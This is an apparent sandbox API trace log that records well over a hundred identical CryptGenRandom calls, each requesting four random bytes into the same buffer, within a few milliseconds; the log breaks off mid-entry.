1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.243] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.244] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 